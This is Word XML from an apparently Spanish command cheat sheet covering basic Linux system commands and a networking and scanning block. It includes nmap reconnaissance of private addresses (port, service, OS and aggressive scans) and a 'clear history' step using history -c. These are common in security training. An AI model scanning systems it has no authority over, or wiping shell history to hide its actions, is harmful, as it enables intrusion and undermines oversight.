            <wp:extent cx="2486025" cy="628650"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1480656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56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sudo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED5FABD" w14:textId="2F7A48AD" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>kill</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -9 PID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6200FDAD" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4A4F5BDC">
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7DC35F" w14:textId="77777777" w:rsidR="002B448B" w:rsidRDefault="002B448B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C77EF12" w14:textId="77777777" w:rsidR="002B448B" w:rsidRDefault="002B448B" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B10BE99" w14:textId="09BCD65A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15. Ver conexiones activas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6CCAE0" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>ss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>tuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32BF8466" w14:textId="5D026C07" w:rsidR="00990C31" w:rsidRPr="00206562" w:rsidRDefault="00990C31" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36BD2DC7" wp14:editId="5FFD27B5">
            <wp:extent cx="5400040" cy="615950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34546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6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BE4D" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="6183EFE5">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45248263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16. Alternativa </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>netstat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="75D0AB51" w14:textId="6EF7C21F" w:rsidR="007C6E08" w:rsidRPr="00206562" w:rsidRDefault="007C6E08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31DF241C" wp14:editId="22A97918">
            <wp:extent cx="5400040" cy="2128520"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="160600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0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F7D1" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>netstat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>tuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4DF1DD53" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="1D971064">
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C48F2B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17. Ver puertos abiertos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A590E0E" w14:textId="58D8708A" w:rsidR="007C6E08" w:rsidRPr="00206562" w:rsidRDefault="007C6E08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02625559" wp14:editId="2D7D224B">
            <wp:extent cx="5400040" cy="2316480"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="950966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66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528A" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>lsof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2C63E2" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="475C8AE5">
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="722C2199" w14:textId="77777777" w:rsidR="007C6E08" w:rsidRDefault="007C6E08" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22D684E0" w14:textId="77777777" w:rsidR="007C6E08" w:rsidRDefault="007C6E08" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10296708" w14:textId="77777777" w:rsidR="007C6E08" w:rsidRDefault="007C6E08" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CB02D8E" w14:textId="77777777" w:rsidR="007C6E08" w:rsidRDefault="007C6E08" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E009038" w14:textId="1F62645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18. Ver usuarios conectados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FF5F6D" w14:textId="6F945005" w:rsidR="007C6E08" w:rsidRPr="00206562" w:rsidRDefault="007C6E08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27CEBD97" wp14:editId="414C0161">
            <wp:extent cx="4286250" cy="1181100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="639674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743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9A40" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>who</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="538F3DEC" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4449405E">
          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="003B8646" w14:textId="77777777" w:rsidR="007C6E08" w:rsidRDefault="007C6E08" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D5DC7D9" w14:textId="77777777" w:rsidR="007C6E08" w:rsidRDefault="007C6E08" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="614B60B4" w14:textId="4955CA4B" w:rsidR="007C6E08" w:rsidRDefault="007C6E08" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C3B4C9E" w14:textId="04BEE60A" w:rsidR="007C6E08" w:rsidRDefault="007C6E08" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73D14939" w14:textId="75012DAB" w:rsidR="007C6E08" w:rsidRDefault="007C6E08" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E994541" w14:textId="2E2C5F28" w:rsidR="007C6E08" w:rsidRDefault="007C6E08" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F7F26F3" w14:textId="10F80E55" w:rsidR="007C6E08" w:rsidRDefault="007C6E08" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="023F2010" w14:textId="57BD2012" w:rsidR="007C6E08" w:rsidRDefault="007C6E08" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B493FC1" w14:textId="1EDA98FC" w:rsidR="007C6E08" w:rsidRDefault="007C6E08" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DC62EDB" w14:textId="119C3F32" w:rsidR="007C6E08" w:rsidRDefault="007C6E08" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0748D957" w14:textId="58461FD2" w:rsidR="007C6E08" w:rsidRDefault="007C6E08" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B66723E" w14:textId="79264399" w:rsidR="007C6E08" w:rsidRDefault="007C6E08" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F707372" w14:textId="1A60A095" w:rsidR="007C6E08" w:rsidRDefault="007C6E08" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B6A61B4" w14:textId="2A72BF0D" w:rsidR="007C6E08" w:rsidRDefault="007C6E08" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FC92733" w14:textId="3E6E8B11" w:rsidR="007C6E08" w:rsidRDefault="007C6E08" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FFD7EA6" w14:textId="04F6F251" w:rsidR="007C6E08" w:rsidRDefault="007C6E08" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B1CD2FA" w14:textId="48789BD2" w:rsidR="007C6E08" w:rsidRDefault="007C6E08" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E85CA48" w14:textId="370231A7" w:rsidR="007C6E08" w:rsidRDefault="007C6E08" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0571389C" w14:textId="5281787D" w:rsidR="007C6E08" w:rsidRDefault="007C6E08" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="764BC082" w14:textId="52715EBA" w:rsidR="007C6E08" w:rsidRDefault="007C6E08" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39477B2C" w14:textId="02675D42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19. Historial de comandos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DEA5D1" w14:textId="4C9E3EF3" w:rsidR="007C6E08" w:rsidRPr="00206562" w:rsidRDefault="007C6E08" w:rsidP="0020656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DE1BC54" wp14:editId="0802CA5F">
            <wp:extent cx="4415155" cy="8892540"/>
            <wp:effectExtent l="0" t="0" r="4445" b="3810"/>
            <wp:docPr id="781045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450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51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2B2B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:lastRenderedPageBreak/>
        <w:t>history</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="597DBE7A" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4937336F">
          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48012E74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20. Limpiar historial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D054ED3" w14:textId="5838D09D" w:rsidR="007C6E08" w:rsidRPr="00206562" w:rsidRDefault="007C6E08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16A7F12D" wp14:editId="43DC1288">
            <wp:extent cx="2295525" cy="1304925"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1057979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94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F3B3" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>history</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1518E2" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="65BD08A2">
          <v:rect id="_x0000_i1045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40685D82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🌐</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> BLOQUE 2: REDES Y ESCANEO (21–40)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED82209" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="20010A7E">
          <v:rect id="_x0000_i1046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="449E9CFE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21. Escaneo básico con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6AE5229D" w14:textId="0907A89F" w:rsidR="00E43858" w:rsidRPr="00206562" w:rsidRDefault="00E43858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05DC972F" wp14:editId="7AA09B1F">
            <wp:extent cx="5143500" cy="3629025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="525615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153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A181" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB5948C" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="62FC3CDE">
          <v:rect id="_x0000_i1047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5310B206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22. Escaneo de puertos específicos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583063E0" w14:textId="018951A0" w:rsidR="00E43858" w:rsidRPr="00206562" w:rsidRDefault="00E43858" w:rsidP="0020656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C0D0FBD" wp14:editId="6C218A5E">
            <wp:extent cx="5267325" cy="2962275"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="913354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543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70FD" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -p 22,80,443 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541D6776" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="01B7FA3A">
          <v:rect id="_x0000_i1048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0716F3A3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23. Escaneo rápido</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163E2D7F" w14:textId="75A43B07" w:rsidR="003F3297" w:rsidRPr="003F3297" w:rsidRDefault="003F3297" w:rsidP="00206562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8796A96" wp14:editId="70241FFC">
            <wp:extent cx="5400040" cy="2339975"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1847453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535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588F" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -F 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478B1D19" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="0A0733ED">
          <v:rect id="_x0000_i1049" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE815EF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24. Escaneo de red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4848D3E1" w14:textId="4FDE3D69" w:rsidR="003F3297" w:rsidRDefault="003F3297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1BE6C282" wp14:editId="7EC0B523">
            <wp:extent cx="5295900" cy="800100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="90153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36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96D8" w14:textId="77777777" w:rsidR="003F3297" w:rsidRPr="00206562" w:rsidRDefault="003F3297" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="689E4119" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:lastRenderedPageBreak/>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A343CAB" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="515FCF0F">
          <v:rect id="_x0000_i1050" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="610824C4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25. Detección de servicios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A1EAB7" w14:textId="3D990010" w:rsidR="003F3297" w:rsidRPr="00206562" w:rsidRDefault="003F3297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31A43683" wp14:editId="03CC0B1F">
            <wp:extent cx="5305425" cy="876300"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="2117106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068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5955" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAADB75" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="6397599D">
          <v:rect id="_x0000_i1051" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB1FF95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26. Detección de SO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DE3D4C" w14:textId="5E8A9376" w:rsidR="003F3297" w:rsidRPr="00206562" w:rsidRDefault="003F3297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054806CA" wp14:editId="5821F457">
            <wp:extent cx="5400040" cy="1066165"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="523351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517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B611" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -O 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA39A31" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4055D186">
          <v:rect id="_x0000_i1052" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="425F38EB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27. Escaneo agresivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB2F32E" w14:textId="09574FE0" w:rsidR="003F3297" w:rsidRPr="00206562" w:rsidRDefault="003F3297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759FE737" wp14:editId="0EC16BF3">
            <wp:extent cx="5400040" cy="1450340"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1287075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759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7798" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -A 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5153F575" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="3753D454">
          <v:rect id="_x0000_i1053" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFC7148" w14:textId="273F9BC4" w:rsid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28. Guardar resultados</w:t>
      </w:r>
      <w:r w:rsidR="002B448B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E4778C2" wp14:editId="0D01D7D4">
            <wp:extent cx="5400040" cy="2315845"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="696228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284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C531" w14:textId="4F280A31" w:rsidR="003F3297" w:rsidRPr="00206562" w:rsidRDefault="003F3297" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B92A097" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>oN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> resultado.txt 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632774A1" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="26055B68">
          <v:rect id="_x0000_i1054" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB23208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29. Ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31281A13" w14:textId="6038E306" w:rsidR="003F3297" w:rsidRPr="00206562" w:rsidRDefault="003F3297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016A48A2" wp14:editId="3A20B4A7">
            <wp:extent cx="5400040" cy="2743200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1975399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991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4C2C" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>ping google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04152A26" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="369063CC">
          <v:rect id="_x0000_i1055" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFEB884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30. Ver ruta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3E51B6" w14:textId="72A8226C" w:rsidR="003F3297" w:rsidRPr="00206562" w:rsidRDefault="003F3297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373D774E" wp14:editId="203AF00F">
            <wp:extent cx="5400040" cy="730885"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1467750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508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6915" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>traceroute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> google.com</w:t>
      </w:r>
    </w:p>
